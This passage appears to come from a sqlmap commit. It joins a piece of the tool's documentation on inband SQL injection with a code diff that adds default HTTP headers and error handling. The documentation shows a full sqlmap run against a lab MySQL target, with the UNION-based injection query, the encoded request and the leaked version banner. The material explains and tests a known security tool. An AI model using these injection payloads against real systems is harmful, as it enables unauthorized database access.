Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect2>Estimated time of arrival
<p>

8
lib/core/option.py
View File

@ -278,6 +278,13 @@ def __setHTTPMethod():
conf.method = "GET"
def __setHTTPStandardHeaders():
conf.httpHeaders.append(("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"))
conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
conf.httpHeaders.append(("Accept-Encoding", "gzip,deflate"))
conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
def __defaultHTTPUserAgent():
"""
@return: default sqlmap HTTP User-Agent header
@ -566,6 +573,7 @@ def init(inputOptions=advancedDict()):
__setHTTPCookies()
__setHTTPReferer()
__setHTTPUserAgent()
__setHTTPStandardHeaders()
__setHTTPMethod()
__setHTTPAuthentication()
__setHTTPProxy()

14
lib/request/connect.py
View File

@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import httplib
import md5
import re
import socket
@ -182,6 +183,19 @@ class Connect:
warnMsg += " or proxy"
raise sqlmapConnectionException, warnMsg
except httplib.BadStatusLine, _:
warnMsg = "the target url responded with an unknown HTTP "
warnMsg += "status code, try to force the HTTP User-Agent "
warnMsg += "header with option --user-agent or -a"
if conf.googleDork:
warnMsg += ", skipping to next url"
logger.warn(warnMsg)
return None
else:
raise sqlmapConnectionException, warnMsg
parsePage(page)
responseMsg += "(%s - %d):\n" % (status, code)